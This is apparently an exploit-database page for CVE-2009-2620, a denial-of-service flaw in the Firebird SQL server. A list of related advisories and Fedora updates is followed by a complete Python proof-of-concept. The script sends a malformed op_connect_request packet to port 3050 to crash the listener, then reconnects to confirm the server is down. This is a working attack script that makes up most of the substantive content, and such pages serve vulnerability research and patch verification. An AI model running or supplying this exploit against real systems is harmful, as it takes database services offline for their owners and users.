| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
| Firebird SQL op_connect_request main listener shutdown Vulnerability | 28 Jul 200900:00 | – | zdt | |
| CVE-2009-2620 | 28 Jul 200900:00 | – | circl | |
| Firebird SQL op_connect_request main listener shutdown vulnerability | 28 Jul 200900:00 | – | coresecurity | |
| Firebird SQL op_connect_request Denial of Service (CVE-2009-2620) | 31 Jan 201000:00 | – | checkpoint_advisories | |
| CVE-2009-2620 | 29 Jul 200917:00 | – | cve | |
| CVE-2009-2620 | 29 Jul 200917:00 | – | cvelist | |
| Firebird SQL - op_connect_request main listener shutdown | 28 Jul 200900:00 | – | exploitdb | |
| Firebird SQL - op_connect_request main listener shutdown | 28 Jul 200900:00 | – | exploitpack | |
| [SECURITY] Fedora 11 Update: firebird-2.1.3.18185.0-2.fc11 | 31 Aug 200923:40 | – | fedora | |
| [SECURITY] Fedora 10 Update: firebird-2.1.3.18185.0-2.fc10 | 31 Aug 200923:36 | – | fedora |
import socket
import time
def attack(host, port):
op_connect_request = '\x35' # Request to establish connection
packet = '\x00\x00\x00' + op_connect_request
packet += "A" * 12 #Invalid data, must be >= 12 bytes in order to trigger the DoS
print "(+) Connecting to the server...."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
print "(+) Sending op_connect_request packet..."
s.send(str(packet))
s.close()
print "(+) op_connect_request packet successfully sent."
#Wait 10 seconds and try to connect again to Firebird SQL server, to check if it's down
print "(+) Waiting 10 seconds before trying to reconnect to the server..."
time.sleep(10)
try:
print "(+) Trying to reconnect..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.close()
print "(!) Something went wrong. The server is still alive."
except socket.error:
print "(*) Attack successful. The server is down."
port = 3050
host = '192.168.131.128' #Replace with your target host
attack(host, port)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation